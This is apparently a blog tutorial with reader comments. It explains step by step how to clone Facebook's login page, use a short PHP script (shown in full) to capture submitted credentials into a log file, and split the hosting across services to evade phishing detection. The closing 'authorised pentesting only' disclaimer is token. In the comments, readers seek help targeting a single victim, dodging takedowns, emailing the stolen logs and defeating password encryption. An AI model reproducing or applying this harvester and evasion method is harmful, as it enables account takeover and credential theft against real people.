Hello there,
Recently I have come across many guides about creating phishing pages. Although the principles behind each guide is similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy!
Step 1: Download the HTML Index of the Target Webpage
To start off, you need to obtain the HTML index of the page. There are various methods of doing this, there are even templates online for popular sites. In this tutorial, I am going to use the most basic way in order to be as noob-friendly as possible.
Navigate to Your Webpage
In this tutorial, I am going to phish Facebook.
View the Source of the Webpage.
Depending on your browser, there may be different methods. Normally it is done by right clicking the site and clicking "View Source". I have done that on my browser and a windows should come out similar to this:
On the box to the right is the source of the website. Which leads on to the next step:
Downloading and Saving the Source Code
Select the box, and copy-paste everything in the box to a txt document. Use Notepad on windows, and a simple text editing program if you are not using windows. (Don't use programs like Word or Pages because it is really slow). After you have done that, click "Save As" or whatever option that allows you to save that document. On Notepad it should look like this:
Change "Save as type" to All Files and change the encoding to Unicode.
After that, name the document "index.html", obviously without the speech marks.
Congratulations! You have finished the first step of the tutorial!
Step 2: Creating a PHP File for Password Harvesting
The PHP file is basically the tool that harvests the users password in this scenario. There are several ways you can create this PHP if you have some programming knowledge, but if you don't, just copy my exemplar PHP.
<?php
header ('Location: facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>
Same as above, save the PHP file as "All Files" and as "post.php". Change the encoding to Unicode and you should be ready to go!
Step 3: Modify the Page HTML File to Incorporate Your PHP File in It.
Now, we need to incorporate our PHP file, to receive passwords that the users send.
Find the Password-Sending Method
First, you need to see how the website deals when the user submits a username-password.
For Facebook, all you need to do is to Ctrl-F and type "=action" in the field.
Now, you need to replace everything in the underlined portion with "post.php", keep the speech marks. (just one set please).
Obviously, this method will be different for other websites. A good method to find it is by using Inspect Elements tool in most modern browsers and clicking on the login button. Find something similar to the above method.
Please note: You will need to change this later when you actually host the website.
Step 4: Hosting the PHP File for Password Storing
Now here is the juicy part, making your fake website online so other people can browse it.
You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called "FTP". For this tutorial, I will be using 000webhost.
Navigate to the FTP Server for Your Web Hosting Service
For this step, I assume that you have already created a website with your hosting service.
For 000webhost, you simply click on "File manager" and click "Upload Files". Here is a picture of the FTP server for 000webhost:
Ignore the other files, those are just some of my personal stuff, unrelated to this tutorial.
Upload Your PHP Files and Change Permission
As you can see, I have already uploaded my PHP file. But you need to just upload it to the main folder of your FTP server. (Some FTP server doesn't allow you to upload to the root folder, just follow their particular instructions).
Now you need to change the permission to "777", which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one.
Now you can close the FTP server. Note down your web address!
Step 5: Hosting the Actual Phishing Page
For this step, you will need to use the exact hosting provider that I use, otherwise you will get banned.
There is a reason why I don't use the same hosting provider for my actual page, and that is because most hosting providers will employ some kind of scanning to detect phishing pages. I can tried multiple hosting services in the past and all of them banned me within 30 mins of uploading the index file.
Configuring the post.php Forum
Now, before you host the website, remember the post.php/login form thing we configured above?
You need to find the login form thing again in your index.html and replace the "post.php" with "http://yourwebsiteforyourpostphpupload/post.php", assuming that you uploaded to the root folder. Remember to add http:// in front of the site. In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to Facebook.com, if it does then you have pasted the correct site. If it doesn't, then double check if you have uploaded your file to the correct directory.
Hosting the Actual Page
Navigate to htmlpasta.com. You will see something similar to this:
Then, you need to copy the index.html file for your phishing site and paste it in here.
Now, click on the reCAPTCHA and click paste, you will get a link for your website.
Step 6: Congratulations!
Congrats! You have finished hosting your first phishing site! Navigate to your site and try to enter some fake login details, after you click the login button, it should redirect you to facebook.com. Login to your FTP server that you hosted your post.php file, and there should be a new document called Log.txt that is stored within the same folder as your post.php file. Any login details should be stored there.
Remember, please do not use this for malicious purpose, only use for penetration testing and with authorisation from your victims.
If you have any question then please comment down below.
53 Responses
How do you create it as a mobile page i did the same steps for the mobile html source code but when i click on the login button it doesnt do anything
_which hosting service should i use its my first time
For my website I use XAMPP. It's free and you get as much storage for your website as your pc has.
Having a problem with my post.php file not interpreting
Hi, were you able to solve this problem? I am also stuck with the same error.
me too i too need help plzz help
Change it from unicode to ANSI coding. I had same problem ,after changing my post.php coding to ANSI ,it was solved
Followed the instructions but after i type the password to check if it works it looks for the post php page within the html pasta domain. tried using other hosting sites and it did the same thing. my post php does work but im not able to link to it
I need your phishing page
Please Sir,
Tell me...
Do Have the Ability to Create the Page in *XML* for *blogger.com* ???
Because blogger.com is an ideal site.
And i have tested. It is fully working.
Can you tell me *htmlpasta.com* alternatives ???
Hi. did u get any alternative for htmlpasta.com??
Followed the commands however after i type the password to check if it really works it seems for the publish php page within the html pasta area. Attempted using other web hosting sites and it did the identical component. My submit php does paintings however im no longer able to hyperlink to it
Hello Admin, thanks for the share, i tried it and worked like magic. however just as u mentioned, it doesnt work for every site. Please can u share how to phish hotmail login page? i have managed to clone the login page but after inputing the email id, it wont proceed to the password input screen.
Please help.
Hey help me I can't get step 5
i have doubt with uploading php file.should i upload index.html file too with php file?
When I view my log.txt file, there appears to be no login details showing up. I have completed everything the way that you have instructed us to, however I am unable to receive login details as the login.txt file is empty.
Hello. can you please help, how did your log.txt folder showed up. Cause i have done everything, every step and the website is also ready. But whenever i test the website no log.txt folder appears on 000webhost.com
guys can someone please help me?
i cant understand what i must do on stage 5
what should i change post.php to on my index.html?
i cant see a log.txt folder please help.
Can somebody pls help me with this line
http://yourwebsiteforyourpostphpupload/post.php
Am I suppose to write the name of my website....pls somebody should do example for me pls
i have the same error my link never go on facebook, it write :
"$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n\n\n\n"); fclose($handle); exit; ?>"
my link is : https://(myooowebhostwebsite)/post.php
I have try with "post.php" in the racine (error404) and in the public folder (previous error)
How to know if it's the password?
hello admin i have a problem in hosting that site blocked me can u please help me
How to get the password. It is only showing email.
Yes me too any help on that please?
i need help on this too please
I need some help.
It works great, redirects me to facebook, but when I try to log in
In my "log.txt" file does not show anything. How to fix it?
Please help.
Bro I'm having trouble at the "http://yourwebsiteforyourpostphpupload/post.php"
What do I need to add there? The 000WebRoot Host name ?
and do I need to add ".com" or just the "/postphp" part
Hi did it work?
Please help me.
When I tried to send the link to a messenger, the URL preview is like this. Is there any way to remove it or change it so the site will be more legitimate looking?
they r banning me with in 2 min.....plzz help
Mine isn't redirecting me to any page. I'm not sure if I'm correctly replacing post.php with the right URL "http://yourwebsiteforyourpostphpupload/post.php" (I'm inserting the Host username I created on 000WebRoot)
I'm stuck on this part can someone help please
I'll also add that I didn't save my post.php file as "save all files" because Mac won't let me on "Textedit" software. That might be the issue i'm not sure its my first time creating these pages. Any info will help thanks.
How do i get the password from the log.txt, this is what shows up in mine
jazoest=2700
lsd=AVqwMSi4
email=f....y@my.com
timezone=420
lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzI4LCJjIjoyNH0=
lgnrnd=052059_AEn3
lgnjs=1588594679
abtestdata=AAAAAAAffAAAffAAAAAAAAfAA/AAAAAAAAAAAAAAq//AAAAAAAEAAB
locale=en_GB
next=web.facebook.com
loginsource=loginbluebar
guid=f5364a33e87078
prefillcontactpoint=f.....y@my.com
prefillsource=browseronload
prefilltype=contactpoint
ep=#PWD_BROWSER:5:1588594691:Ac5QAMjnTVDHohTruvF63nw7+HnUVNcwv8bFqYV2RR5wi5kDOorHYhMxH2ymKDNxVpil0vcydnUfloIpPkQGOKPjSRAgoZlgwsec/sV0zoYAEc8RuFObRvUBfmi22nt565TtHLy1SDs8XmB4
I could use help with this too. I am getting the password encrypted as encpass.
superb tricck thank you buddy
How do I save as "all files" . on a mac ???
Nice Trick!
Mine isn't redirecting me to any page. I'm not sure if I'm correctly replacing post.php with the right URL "http://yourwebsiteforyourpostphpupload/post.php" (I'm inserting the Host username I created on 000WebRoot)
I'm stuck on this part can someone help please
I'll also add that I didn't save my post.php file as "save all files" because Mac won't let me on "Textedit" software. That might be the issue i'm not sure its my first time creating these pages. Any info will help thanks.
i am having problem in step 5 please help what to put in login form give me the example
I have a question. I purchased some hosting to host the fake facebook page. the problem is that after a few hours that it is online in practice it is reported as if by magic the page alone. and makes the page inaccessible to all browsers. since this page I don't need to sniff accounts to the general public but to a single person. I think the bots that come into contact with my domain are reporting the page. so I think blocking them can solve the problem? is there anyone who understands it who could tell me if this could help? in the end I believe that if the page is alone and without visits of any kind and only the victim can access it, nobody reports anything, doesn't it?
htmlpasta not showing as you tell, any alternatives?
Instead of adding more space, You can easily increase media file upload size in WordPress, By default, the maximum upload size in WordPress ranges from 2MB to 150MB depending on the settings of your web hosting provider is giving by default.
i finished all things but when i try to login it doesnt direct me to facebook.com
and also when i check logins it doesnt right it
Please, help me out with step 5.
I don't get it.
And, which hosting provider do you use?
hi, i want to ask why did the log.txt did not show anything even though I have follow every step
The mistake is from you. Follow the instruction carefully, mine works as well
It works very fine for me, i can get the logs file, but, i would like the logs to be sent directly to my email account.
Could you please show me how i can make the php file send logs direct to email inbox instead of checking the File Manager for logs all the time.?
same here pls help
I followed all the steps carefully but can't find the log.txt in my file manager
Hi there, can you teach a way of getting an email password without a recovery email or phone number? Using phishing methods or another way?
I keep getting kicked out of the the domain once I upload the. Scam page. any idea why? Help
Please ?
when i log into facebook thru my phishing page am i supposed to get an error message or is it supposed to log me into facebook and just capture my credentials in the process?
I am not able to get the password. It is showing encryption, saying encpass... How do I bypass the encryption in order to show the password?
Share Your Thoughts